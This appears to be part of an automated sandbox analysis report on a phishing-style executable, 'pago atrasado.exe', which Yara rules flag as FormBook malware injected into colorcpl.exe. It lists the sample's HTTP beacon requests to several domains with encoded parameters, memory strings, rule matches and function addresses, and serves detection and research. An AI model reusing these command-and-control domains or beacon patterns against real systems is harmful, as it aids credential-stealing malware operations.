          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.everythangbutwhite.com/
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/display.cfm
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/px.js?ch=1
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/px.js?ch=2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp
          Source: unknownDNS traffic detected: queries for: www.highvizpeople.com
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: pago atrasado.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004047D3
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004061D4
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10008826
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10003D10
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100110D1
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000F8F2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001199C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100059A1
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A9E5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A9F4
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000B22E
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000FE64
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10005E95
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100062AD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100066E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10006B17
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000F380
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041D0F5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041C0FC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B8B6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041C985
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041C3AF
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00408C70
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041BD45
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041A6B6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A920A8
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DB090
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F20A0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A928EC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81002
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CF900
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E4120
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A922AE
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FEBB0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8DBD2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A92B28
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D841F
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8D466
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A925DD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DD5E0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A92D07
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C0D20
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A91D55
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A92EF7
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E6E30
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8D616
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A91FF1
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041D0F5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041C0FC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041B8B6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041C985
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045620A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04601D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04530D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04554120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04556E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B8B6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1D0F5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1C985
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1A6B6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B02FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B08C70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B08C6B
